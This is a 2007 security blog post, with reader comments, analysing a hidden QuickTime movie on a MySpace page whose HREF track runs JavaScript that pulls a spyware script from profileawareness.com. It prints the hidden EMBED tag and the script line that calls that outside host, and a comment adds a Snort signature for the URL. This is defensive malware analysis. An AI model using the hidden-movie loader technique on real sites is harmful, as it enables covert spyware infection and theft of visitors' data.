Didier Stevens

Monday 12 March 2007

P0wned by a QT movie

Filed under: Malware — Didier Stevens @ 10:14

Here’s an interesting infection vector, used by a new malware: it’s a QuickTime movie!

McAfee VirusScan detects the malware as JS/SpaceTalk Trojan. The description for this malware is empty, your guess of the characteristics of this malware is as good mine.

Interested in the details? Read on!

This Myspace page (of a French rockband) has an embedded QuickTime movie. Here’s the EMBED HTML tag in the source (I changed the formatting to make it more readable):

  <embed
    enableJavascript="false"
    allowScriptAccess="never"
    allownetworking="internal"
    src=http://profileawareness.com/tys4.mov
    hidden=true />

The EMBED tag instructs your browser to play a movie when it renders the HTML page. But in this case, the movie is hidden (attribute hidden is true). It’s a QuickTime movie, downloaded from the profileawareness.com server.

This tys4.mov QuickTime movie is sneaky: it contains JavaScript code to download and execute another JavaScript program. QuickTime has a feature that allows you to embed URLs or JavaScript in a movie. Apple calls this feature HREF tracks. From the Apple site:

An HREF track is a special type of text track that adds interactivity to a QuickTime movie. HREF tracks contain URLs that can specify movies that replace the current movie, load another frame, or that load QuickTime Player. They can also specify JavaScript functions or Web pages that load a specific browser frame or window.

An HREF track is not meant to be displayed; it simply contains link information. The URLs in an HREF track can be interactive or automatic. An interactive URL loads when you click anywhere in the movie’s display area. An automatic URL loads as a movie is playing at the exact frame specified by a text descriptor timestamp in the HREF track. With automatic URLs, you can create a narrated tour of a website, use web pages as slides in a presentation, activate a JavaScript command, or do anything else that requires loading movies or web pages in a predetermined sequence.

The syntax for an HREF track is simple, here’s an example that automatically loads the page http://www.google.com 1 minute into the movie:

  [00:01:00.00]

  A<http://www.google.com> T<frame>

Let’s take a look inside the tys4.mov QuickTime movie. First we use the strings command to dump all strings contained in this QuickTime file.

  strings tys4.mov

Here is what we see at the end of the dump:

qt_strings.PNG

Do you recognize the syntax at the end: A<javascript> T<>
It will automatically execute a JavaScript script when the movie is played (since there is no timestamp, the script executes immediately).
The script is simple: it creates a script tag and adds it to the HTML page, thereby downloading and executing a new script from the profileawareness server:

<script src=’http://profileawareness.com/logs4/sqltrack.js‘/>

It’s this script that is detected by McAfee (at the moment of writing, McAfee was the only antivirus on VirusTotal to detect this script).

The QuickTime fileformat is a binary, hierarchical stream of atoms.
Qtatomizer is a tool to display this hierarchy of atoms.

qt_qtatomizer.PNG

The QuickTime movie is what is known as a Downloader, but AV programs do not detect it.

The downloaded script is just Spyware, it will collect data about the Myspace user viewing the page and upload it to the profileawareness server.

qt_script.PNG

To summarize the actions:
• You visit a website
• It plays a hidden QuickTime movie
• The QuickTime movie automatically downloads a JavaScript program
• The JavaScript program is executed

29 Comments »

  1. *shakes a fist at QuickTime trying to do too much*

    Nice analysis, Didier! I always like reading your posts like this, as they are easy to follow and give a really good example/tutorial for those of us who’ve not done something like this before.

    Comment by LonerVamp — Monday 12 March 2007 @ 13:40

  2. Wow, good job! I never suspected that Quicktime movies could be used as an attack vector. Oh my, think about how effective this could be if the sites peddling free pr0n samples would start using this technique.

    Btw, I’m pretty sure the technical term here should be “Pwnt” or “Pwned”. This is the first time I saw someone spell it “P0wned”. ;)

    Comment by Luke — Monday 12 March 2007 @ 14:07

  3. Thanks.

    About P0wned: I was inspired by Harlan’s post “P0wned by certs” (http://windowsir.blogspot.com/2007/01/p0wned-by-certs.html)

    Comment by Didier Stevens — Monday 12 March 2007 @ 14:15

  4. [...] you know that you can embed JS scripts in Apple Quicktime movies? (the feature is called “HREF tracks”) An HREF track is a special type of text track [...]

    Pingback by QuickTime movies as malware infection vector at Security Samizdat — Monday 12 March 2007 @ 15:11

  5. nice analysis, QuickTime has a few other issues similar to this one. You can read about them here:

    http://www.gnucitizen.org/blog/backdooring-quicktime-movies/

    http://www.gnucitizen.org/blog/backdooring-mp3-files/

    Comment by pdp — Monday 12 March 2007 @ 17:36

  6. [...] Here’s a link to the blog entry: http://didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/ [...]

    Pingback by average admins » Blog Archive » P0wned by a QT movie — Monday 12 March 2007 @ 21:07

  7. This exploit vector should have been taken care of with the Quicktime 7.1.5 update (dating March 6th).

    http://developer.apple.com/documentation/QuickTime/Conceptual/QTScripting_JavaScript/bQTScripting_JavaScri_Document/chapter_1000_section_4.html

    As your article was published March 12th I’m surprised that you did not include any information about this update.

    Regards,
    Joachim

    Comment by Joachim Buechse — Friday 16 March 2007 @ 11:30

  8. Thanks Didier, good info.

    Symantec now sees the Javascript sqltrack.js as Infostealer.

    Steve

    Comment by Steve — Friday 16 March 2007 @ 11:48

  9. Anyone think of a little ‘poison the well’ approach with the javascript? IE, sending a bunch of crap to fill their tracking server… I know I’ve thought of it.

    Comment by bongo mcginty — Friday 16 March 2007 @ 13:02

  10. Hello,

    Does anyone know if this vulnerability was patched with the update that Apple released last week? Specifically, I’m thinking of:

    CVE-ID: CVE-2006-4965, CVE-2007-0059

    Available for: Mac OS X v10.3.9 and later, Windows Vista/XP/2000

    Impact: Viewing a maliciously-crafted QuickTime movie file or QTL file may lead to arbitrary JavaScript code execution in context of the local domain

    Description: A cross-zone scripting issue exists in QuickTime’s browser plugin. By enticing a user to open a malicious QuickTime movie file or QTL file, an attacker can trigger the issue, which may lead to arbitrary JavaScript code execution in context of the local domain. This issue has been described on the Month of Apple Bugs web site (MOAB-03-01-2007). This update addresses the issue by performing additional validation of QuickTime movie files and QTL files.

    http://docs.info.apple.com/article.html?artnum=305149

    Comment by Dan Goodin — Friday 16 March 2007 @ 14:03

  11. This is the same old problem as ‘doze media player has been suffering from for years: they call them ‘url flips’. See, e.g.

    http://marc.theaimsgroup.com/?l=bugtraq&m=101447771102582&w=2

    http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0112.html

    for a couple of malicious uses.

    Comment by DaveK — Friday 16 March 2007 @ 16:39

  12. [...] detailed analysis of this interesting infection vector can be viewed at Didier Stevens’s blog. A silver lining in the whole murky episode is that McAfee customers are proactively protected from [...]

    Pingback by Computer Security Research - McAfee Avert Labs Blog — Friday 16 March 2007 @ 17:24

  13. Apple fixed a similar issue in 7.1.5. Check http://docs.info.apple.com/article.html?artnum=305149
    and search for scripting.

    Are you using 7.1.5? If so, did you actually see any script execution, or are you just going by the McAfee alert?

    Comment by Anonymous — Saturday 17 March 2007 @ 4:31

  14. Could a java script run an executable through the Apple Quicktime flaw? Just a asking because I have been infected by malware and I think this could be the tehnique. And a little example if this can be done. Thank you in advance.

    Comment by priv8 — Saturday 17 March 2007 @ 12:43

  15. MySpace hat einen Quicktime Exploit

    Wie vor fast einer Woche schon entdeckt gibt es auf MySpace ein Exploit in .mov Filmem ( z.B.  beim Besuch der band Mamasaid.. beim öffnen dieser wird ein Script im Hintergrund ausgeführt.
    “Das Script ermittelt den Myspace-Benutzernamen des Be…

    Trackback by grafikworkX - the design factory — Sunday 18 March 2007 @ 5:29

  16. [...] that acts as the spyware, according to the researcher, Didier Stevens, who documents his findings here.http://www.theregister.com/2007/03/16/myspace_quicktime_exploit/&nbsp; Share this post: email it! | [...]

    Pingback by DP's Security Bits : MySpace-hosted malware exploits QuickTime flaw — Sunday 18 March 2007 @ 8:30

  17. @Joachim

    > As your article was published March 12th I’m surprised that you did not include any information about this update.

    The explanation is very simple: I discovered this and wrote the article before Apple published a fix, and I was not aware that Apple had released a fix for this when I published the article. I don’t use QT, it’s not installed on my systems.

    Comment by Didier Stevens — Sunday 18 March 2007 @ 13:42

  18. @priv8

    Yes, the JavaScript could exploit a browser vulnerability to execute an executable in the user’s security context.

    Comment by Didier Stevens — Sunday 18 March 2007 @ 13:51

  19. Can you go into more detail on the last comment? What type of browser vulnerability would need to exist to execute an executable from Javascript?

    Comment by Anonymous — Sunday 18 March 2007 @ 17:11

  20. [...] version (7.1.5) without support for JavaScript. This happened about a week before I posted “P0wned by a QT movie”. I had analyzed the infection and written (but not published) my post before Apple published the [...]

    Pingback by Update: P0wned by a QT movie « Didier Stevens — Sunday 18 March 2007 @ 19:14

  21. @Anonymous

    ADODB.Stream for example, http://www.f-secure.com/v-descs/adodb_stream.shtml

    Comment by Didier Stevens — Monday 19 March 2007 @ 11:36

  22. [...] detailed analysis of this interesting infection vector can be viewed at Didier Stevens’s blog. A silver lining in the whole murky episode is that McAfee customers are proactively protected from [...]

    Pingback by Chris Mosby at myITforum.com : McAfee Avert Labs Blog - MySpace Woes: Trojan Targets French Rock Band Fans - Friday March 16, 2007 — Monday 19 March 2007 @ 16:14

  23. Posted a Snort sig to BleedingThreats.net.

    alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”BLEEDING-EDGE CURRENT EVENTS SpaceTalk-QT-js”; flow:to_server,established; uricontent:”/logs4/sqltrack.js”; nocase; classtype:trojan-activity; reference:url,didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/; sid:2003507; rev:1;)

    Comment by Russ McRee — Monday 19 March 2007 @ 17:57

  24. [...] to execute scriptable content in the context of the current website. Didier Stevens has a nice write up of the particular exploit.  Though it appears patched with the latest version of Quicktime it [...]

    Pingback by :: Binary Paradox :: » Blog Archive » A Eulogy for Flatfiles — Monday 19 March 2007 @ 18:02

  25. I am protected by McAfe…but have this trojan I suspect…is it possible that somehow this malware or whatever can disable my virus protection? There have been a few occasions when I have found my protection disabled, yet I hadn’t disabled it.

    Elizabeth

    Comment by Elizabeth m Maloney — Wednesday 28 March 2007 @ 1:57

  26. Yes, a lot of malware programs can disable security software, like AV. However, most of them can only do this when you run as local admin.

    Comment by Didier Stevens — Sunday 1 April 2007 @ 18:49

  27. their own personal space at last

    Yeah!. Congratulations for the blog
    Your post is very interesting .In your blog are a lot of good post..
    I’ll bookmark you.
    A462fc6cb9bbeb

    Trackback by me 4you — Wednesday 25 April 2007 @ 21:23

  28. Peace people

    We love you

    Comment by HelloWorld — Saturday 28 April 2007 @ 11:48

  29. I think I’ve read something simillar a few days ago. I don’t remember where, might have been on digg.com or slashdot.

    Comment by kevstelo — Monday 11 June 2007 @ 7:30


RSS feed for comments on this post. TrackBack URI

Leave a Reply (comments are moderated)

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

The Rubric Theme. Blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

Join 234 other followers

%d bloggers like this: